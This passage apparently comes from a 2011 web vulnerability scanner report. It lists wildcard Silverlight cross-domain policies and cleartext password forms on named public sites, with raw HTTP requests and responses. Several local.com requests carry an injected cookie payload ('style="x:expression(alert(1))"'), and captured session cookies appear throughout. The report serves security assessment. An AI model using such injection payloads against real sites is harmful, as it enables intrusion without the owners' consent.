GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 18:54:04 GMT
Date: Thu, 03 Feb 2011 13:42:58 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.3. http://dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a92e8be3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:06:48 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.4. http://omnituretrack.local.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:06 GMT
Server: Omniture DC/2.0.0
xserver: www375
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.5. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 02 Feb 2011 17:43:30 GMT
Expires: Wed, 02 Feb 2011 17:43:26 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 81632
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.6. http://api.bing.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=91EAB46F84594F0BBDFDA6EF008A1930; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=1B1BC0ECE78B4BFB99962A5130D7F53B; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

6.7. http://www.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279716841700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 17:00:16 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

7. Cleartext submission of password
There are 39 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:39 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ba6gnf15v1.app325a; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=493
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<div align="right" style="margin-right:1px;padding-top:5px;"><FORM id="LogonForm" name="LogonForm" action="UserLogin?NEXTURL=TRC%3Fpg%3Dcenter%26fr_id%3D26972" method="post" style="margin:0px;padding:0px;">
<table border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
<div class="fieldHolder2" style="padding:0;margin:0;"><input class="textInput2" size="10" name="Password" id="Password" value="password" maxlength="20" type="password" onFocus="this.value=''" /></div>
...[SNIP]...

7.2. http://forums.accuweather.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.accuweather.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: forums.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:05:45 GMT
Server: Microsoft-IIS/6.0
Hostname: photo-02
X-Powered-By: PHP/5.2.16
Set-Cookie: session_id=140970ab83b6322d8ecbd3389e56dd24; path=/; httponly
Content-type: text/html
Content-Length: 140999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
       
           <form action="http://forums.accuweather.com/index.php?s=140970ab83b6322d8ecbd3389e56dd24&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/1/login-button.gif" />
...[SNIP]...

7.3. http://lists.arin.net/mailman/listinfo/arin-tech-discuss

Summary

Severity:   High
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-tech-discuss

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /mailman/listinfo/arin-tech-discuss HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-tech-discuss">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

7.4. http://online.barrons.com/article/SB50001424052970203537304576017783391376872.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /article/SB50001424052970203537304576017783391376872.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article/SB50001424052970203537304576017783391376872.html HTTP/1.1
Host: online.barrons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache/2.0.58 (Unix)
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /article/SB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
Set-Cookie: djcs_route=3422cf49-4bc5-4845-811c-c9461f1059b1; domain=.barrons.com; path=/; Expires=Sun Jan 31 14:14:41 2021; max-age=315360000
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /entitlements_handler?mg=reno-barrons&url=http%3A%2F%2Fonline.barrons.com%2Farticle%2FSB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
X-DEBUG-BOX-IDENT: sbkj2kapachep04
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a
X-DEBUG-REQUEST: /public/article/SB50001424052970203537304576017783391376872.html
X-DEBUG-NAMESPACE: reno-barrons
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 19:14:56 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li class="mainLogin hidden" id="nonSubLoginArea">

                       <form method="post" action="http://commerce.barrons.com/auth/submitlogin?mod=BOL_header_login" name="login_form" id="login_form">
<input name="url" value="http://online.barrons.com/home-page" type="hidden">
...[SNIP]...
<li class="loginPassword">Password: <input class="password" type="password" name="password" /></li>
...[SNIP]...

7.5. http://thestreet.adsonar.com/admin/advertisers/indexPl.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.adsonar.com
Path:   /admin/advertisers/indexPl.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /admin/advertisers/indexPl.jsp HTTP/1.1
Host: thestreet.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:29 GMT
Set-Cookie: JSESSIONID=0C3437813DF5779CC72D22EC06A15F49; Path=/admin
Set-Cookie: adm=0C3437813DF5779CC72D22EC06A15F49rwVyiUqocIA9l87ttz; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=804
Connection: Keep-Alive
Set-Cookie: NSC_benjo_fyufsobm_qppm=446c46713660;expires=Thu, 03-Feb-11 15:22:29 GMT;path=/
Content-Length: 16832


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<div id="formsSidebarAlreadyRegisteredInner" >
                   <form id="loginFrm" name="loginFrm" action="" method="post" onsubmit="return doLogin();">
                   <input type="hidden" id="plid" name="plid" value="272054">
...[SNIP]...
<br/>
                   <input type="password" name="pass" value="" /><br/>
...[SNIP]...

7.6. http://www.local.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.7. http://www.local.com/business/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.8. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.9. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
